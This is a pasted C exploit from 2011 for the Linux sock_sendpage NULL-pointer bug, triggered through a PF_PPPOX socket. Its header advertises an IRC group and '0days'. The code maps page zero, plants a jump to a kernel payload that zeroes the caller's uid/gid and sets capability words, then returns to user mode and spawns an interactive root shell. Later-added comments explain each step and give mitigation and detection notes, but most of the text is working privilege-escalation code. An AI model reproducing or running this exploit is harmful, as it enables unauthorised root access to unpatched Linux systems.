ZmEu

udp_sendpage.c / byxd of HaqNET

Feb 28th, 2011
  1. /* UDP PF_PPOX sendpage() , NOT sendmsg... this is round-2 and working on 2011 boxes.
  2. * There IS a grsec_bypass code around.. look hard and you shall see..
  3. * This rewrite was done by xd / haqnet irc - #Haqnet, FUCK EFNET! Join haqnet and watch vnc/SSHD and much much more in action! AND 0days you could only dream of...
  4. * Thanks to many people for help, even those who didnt help, for inspiring me to look harder for this exploit, specially in the_rebel exploit... and, found now a working, new 2011 selinux_bypass code (ref is on this pastebin, just search for selinux_bypass and itll show)
  5. * xd / irc.haqnet.net -ssl 6697 / ipv6.haqnet.net -ssl 6697 , Join us there and, you might even LIKE IT!
  6.  
  7. * ORIGINAL vuln found by multiple people, but the bug was never recoded and, have the addins it does now..wich are some defines wich are VERY cool...vulnerability was discovered by google security team
  8. in 2009 ,just now, it has no SVR_PERSONALITY code,and it compiles fine if you have it setup right.. if it does not compile for you, try
  9. some cmdline gcc like -fPOC etc... i wont help ya there but... i can safely say, 2 things, someone get me a damn php_loader! I would help dev it, or ill endup making one! BUT, i lost mine, no, seriously i did, and, am spewing because it was extremely simple,and was awesome code by awesome people at tr0ll.in :) greets to your ircd :)
  10. Again, xd says: JOIN US at the REAL, new, haqnet..wich has NEW,cpecial bots :), services/iipv6 and,ability to run XDCC,even i will supply working kits, for linux or win32! Hey, who would do this for Xdcc ? no one.. so join us!
  11. xd - 2011
  12. */
  13. #include <stdio.h>
  14. #include <sys/socket.h>
  15. #include <sys/user.h>
  16. #include <sys/types.h>
  17. #include <sys/wait.h>
  18. #include <inttypes.h>
  19. #include <sys/reg.h>
  20. #include <unistd.h>
  21. #include <stdio.h>
  22. #include <stdlib.h>
  23. #include <sys/mman.h>
  24.  
/* Caller's real uid/gid, captured in main() before the trigger; kernel_code()
 * searches kernel memory for this exact pattern. */
static unsigned int uid, gid;

/* File-scope override of PAGE_SIZE (may clash with a definition pulled in by
 * <sys/user.h> on i386); expands to a function call and is used as the
 * ftruncate()/sendfile() length in main(). */
#define PAGE_SIZE getpagezize()
/* had to add this codes in for RHEL and some other x86 boxes,but more importantly,because removed the SVR_PERSONALITY,this now replaces that, but simpler -xd */
#define PF_PPPOX AF_PPPOX // had to add this for OLDER kernels compile
/* Macro expansion is lazy, so defining AF_PPPOX after PF_PPPOX is fine; headers
 * that already define AF_PPPOX will warn about the redefinition. */
#define AF_PPPOX 24

/* i386 user-mode segment selectors and an EFLAGS value (IF set) for the iret
 * frame built in exit_kernel(). */
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
/* Address 40 bytes below the end of array x; only meaningful for a real array
 * (sizeof), not a pointer. Used to pick the user stack pointer for iret. */
#define STACK(x) (x + sizeof(x) - 40)

void exit_code();            // user-mode landing point; defined below, address taken in exit_kernel()
char exit_stack[1024*1024];  // 1 MiB static buffer that becomes the user stack after iret
  39.  
/*
 * Return the word stored at the base of the current kernel stack.
 *
 * Masks the kernel stack pointer with ~8191 (an 8 KiB stack; this only
 * lines up on kernels built with that THREAD_SIZE) and loads the first word
 * of that region. On the i386 kernels this file targets that word is
 * presumably the thread_info->task pointer -- TODO confirm against the
 * target kernel layout. 32-bit only (%esp/%eax), and only meaningful when
 * running in kernel context, hence always_inline into kernel_code().
 */
static inline __attribute__((always_inline)) void *get_current() {
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"   // kernel stack pointer
    "andl %1, %%eax ;"      // round down to the 8 KiB stack base
    "movl (%%eax), %0"      // first word at the base
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}
  51.  
/*
 * Leave kernel mode by overwriting the current stack with an iret frame.
 *
 * The five stores place, from 0x10 down to 0x00 off %esp: SS = USER_SS,
 * ESP = STACK(exit_stack) (a slot near the top of the static exit_stack
 * buffer), EFLAGS = USER_FL, CS = USER_CS, EIP = exit_code. `iret` pops
 * EIP, CS, EFLAGS, ESP, SS in that order, so execution resumes in user mode
 * at exit_code() on the private stack. i386 only (32-bit frame, selectors
 * 0x73/0x7b). Whatever the kernel had in those five slots is destroyed, and
 * this function never returns.
 */
static inline __attribute__((always_inline)) void exit_kernel() {
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"   // SS
    "movl %1, 0x0c(%%esp) ;"   // ESP
    "movl %2, 0x08(%%esp) ;"   // EFLAGS
    "movl %3, 0x04(%%esp) ;"   // CS
    "movl %4, 0x00(%%esp) ;"   // EIP
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
        );
}
  64.  
/*
 * Payload run in kernel context, reached through the jump that main() writes
 * at virtual address 0.
 *
 * Starting at the pointer returned by get_current(), scans up to 1024-13
 * consecutive unsigned ints for the run uid,uid,uid,uid,gid,gid,gid,gid
 * (the values main() stored from getuid()/getgid()). On the first match it
 * zeroes all eight -- presumably the task's credential ids, TODO confirm
 * against the target kernel's struct layout -- then skips past them plus one
 * pointer and sets the next three words to all-ones (presumably capability
 * sets; unverified). Either way it ends in exit_kernel(), which never returns;
 * with no match nothing is written and exit_code() will report failure.
 */
void kernel_code() {
    int i;
    uint *p = get_current();
    for (i = 0; i < 1024-13; i++) {
    if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
    p[0] = p[1] = p[2] = p[3] = 0;   // clear the four uid slots
    p[4] = p[5] = p[6] = p[7] = 0;   // clear the four gid slots
    p = (uint *) ((char *)(p + 8) + sizeof(void *));   // step over the ids and one pointer
    p[0] = p[1] = p[2] = ~0;         // three words set to all-ones
    break;                           // only the first match is patched
    }
    p++;
    }
    exit_kernel();
}
  80.  
/*
 * User-mode landing point after exit_kernel()'s iret; runs on exit_stack.
 *
 * Checks via getuid() whether the credential rewrite in kernel_code() took
 * effect: on failure prints "[-] Failed to root." and exits with -1,
 * otherwise prints "[!] Got root." and replaces the process with an
 * interactive /bin/sh. If execl() fails the function simply returns, with
 * nothing meaningful to return to.
 */
void exit_code() {
    if (getuid() != 0) {
    fprintf(stderr, "[-] Failed to root.\n");
    exit(-1);
    }
    fprintf(stderr, "[!] Got root.\n");
    execl("/bin/sh", "/bin/sh", "-i", NULL);
}
  89.  
/*
 * Driver: maps the zero page, plants a jump to kernel_code() there, and
 * drives the sendpage path of a PF_PPPOX datagram socket with sendfile(2)
 * (the 2009 sock_sendpage NULL-pointer-dereference bug the header refers to).
 *
 * As written:
 *  - records the caller's uid/gid for kernel_code()'s pattern search and
 *    pins them with setresuid()/setresgid();
 *  - mmap()s one page at address 0 with MAP_FIXED (RW only; see the author's
 *    note) and then mprotect()s it RWX;
 *  - writes NOP (0x90) + JMP rel32 (0xe9) at bytes 0..5; the displacement is
 *    &kernel_code - 6 because rel32 is relative to the end of the 6-byte
 *    sequence that starts at 0;
 *  - creates and immediately unlinks a temp file, opens a PF_PPPOX SOCK_DGRAM
 *    socket, sizes the file to PAGE_SIZE and sendfile()s it to the socket.
 *
 * Mitigation/detection notes: the MAP_FIXED mapping at address 0 is refused
 * for unprivileged processes on kernels with a non-zero vm.mmap_min_addr
 * (the author's comment about SELinux bypass code points at the same
 * barrier), and patched kernels reject sendpage on socket families that do
 * not implement it rather than calling a NULL pointer. An unprivileged
 * process mapping page zero, opening a PF_PPPOX socket and sendfile()-ing
 * to it is a distinctive syscall-audit signature. sendfile() is used without
 * <sys/sendfile.h>, and the results of unlink()/ftruncate()/sendfile() are
 * unchecked; on a non-vulnerable kernel sendfile() presumably just fails and
 * main() returns.
 */
int main(void) {
    char template[] = "/tmp/tmporary.XXXXXX";
    int fdin, fdout;
    void *page;
    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);
    if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { // maybe need to READD PROT_EXEC here (xd)... or addin selinux bypas code..
    perror("mmap failure");
    return -1;
    } else {
    if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
    perror("mprotect failure");
    return -1;
    }
    }
    *(char *)0 = '\x90';                                    // NOP
    *(char *)1 = '\xe9';                                    // JMP rel32
    *(unsigned long *)2 = (unsigned long)&kernel_code - 6;  // displacement from end of the jump
    if ((fdin = mkstemp(template)) < 0) {
    perror("mkstemp");
    return -1;
    }
    if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
    perror("socket");
    return -1;
    }
    unlink(template);                    // file stays open via fdin
    ftruncate(fdin, PAGE_SIZE);          // give sendfile() one page to send
    sendfile(fdout, fdin, NULL, PAGE_SIZE);   // trigger: socket sendpage path
}